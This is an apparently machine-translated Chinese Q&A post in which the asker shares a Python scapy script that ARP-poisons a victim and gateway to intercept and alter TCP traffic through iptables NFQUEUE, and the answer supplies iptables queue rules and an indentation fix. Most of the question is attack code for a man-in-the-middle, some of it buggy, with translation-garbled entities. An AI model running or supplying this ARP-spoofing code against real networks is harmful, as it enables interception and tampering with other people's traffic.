用python注入MITM和有效负载

Question

我试图毒化我的本地网络（MITM）以通过TCP获取值，更改并发送它。 （使用scapy和Netfilter和iptables） 我不是可能在运行中更改数据包或我必须创建该副本然后丢弃它并发送具有更改的特定值的新数据包。 现在我写了这段代码，但我没有看到任何数据包。

/proc/net/netfilter/nfnetlink_queue 
0  48352     0 2 65531     0     0        0  1

iptables规则：

iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE

192.168.3.2是受害者，192.168.0.1是网关 和转发：

   /proc/sys/net/ipv4/ip_forward
1

这是我的代码：

    from scapy.all import *
from scapy.error import Scapy_Exception
import os
import sys
import threading
import signal
from netfilterqueue import NetfilterQueue
import nfqueue

INTERFACE       =   'eth0'
TARGET_IP       =   '192.168.0.1'
GATEWAY_IP      =   '192.168.0.2'
PACKET_COUNT    =  100

def test (packet):
    print packet.show()
    packet.accept()

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print '[*] Restoring targets...'
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst='ff:ff:ff:ff:ff:ff', \
        hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", \
        hwsrc=target_mac), count=5)
    os.kill(os.getpid(), signal.SIGINT)

def get_mac(ip_address):
    response, unanswered = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip_address), \
        timeout=2, retry=10)
    for s, r in response:
        return r[Ether].src
    return None

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac
    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print '[*] Beginning the ARP poison. [CTRL-C to stop]'
    while 1:
        try:
            send(poison_target)
            send(poison_gateway)
            time.sleep(2)

        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

        print '[*] ARP poison attack finished.'
        return

    if __name__ == '__main__':
        conf.iface = INTERFACE
        conf.verb = 0
        print "[*] Setting up %s" % INTERFACE
        GATEWAY_MAC = get_mac(GATEWAY_IP)
        if GATEWAY_MAC is None:
            print "[-] Failed to get gateway MAC. Exiting."
            sys.exit(0)
        else:
            print "[*] Gateway %s is at %s" %(GATEWAY_IP, GATEWAY_MAC)

        TARGET_MAC = get_mac(TARGET_IP)
        if TARGET_MAC is None:
            print "[-] Failed to get target MAC. Exiting."
            sys.exit(0)
        else:
            print "[*] Target %s is at %s" % (TARGET_IP, TARGET_MAC)

    poison_thread = threading.Thread(target = poison_target, args=(GATEWAY_IP, GATEWAY_MAC, \
        TARGET_IP, TARGET_MAC))
    poison_thread.start()

    # Create Queue
    q = nfqueue.queue()
    q.open()
    q.bind(socket.AF_INET)
    q.set_callback(test)
    q.create_queue(0)

    try:
        print '[*] Starting sniffer for %d packets' %PACKET_COUNT
        bpf_filter = 'IP host ' + TARGET_IP
        q.try_run()
        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)

    except Scapy_Exception as msg:
        print msg, "Hi there!!"

    except KeyboardInterrupt:
        q.unbind(socket.AF_INET)
        q.close()
        restore_target(GATEWAY_IP, GATEWAY_MAC, TARGET_IP, TARGET_MAC)
        sys.exist()

我确定ARP中毒工作得非常好，但我不知道为什么它没有打印 参考这些链接： ARP-poisoning 和 Change TCP Payload 和

altering-packets-on-the-fly-with-scapy

Answer 1

您应指定用于输入和已建立连接的队列。例如，队列0，192.168.0.2作为您的网关（假设您是网关和进行伪装的网关）：

iptables -I INPUT -s 192.168.0.2 -p tcp --dport 6767 -j NFQUEUE --queue-num 0
iptables -I OUTPUT -d 192.168.0.2 -p tcp --sport 6767 -m conntrack --ctstate RELATED,ESTABLISHED -j NFQUEUE --queue-num 0

请修改你的代码，好像是来自＆＃34; main＆＃34;已经进入＆＃34; poison_target＆＃34;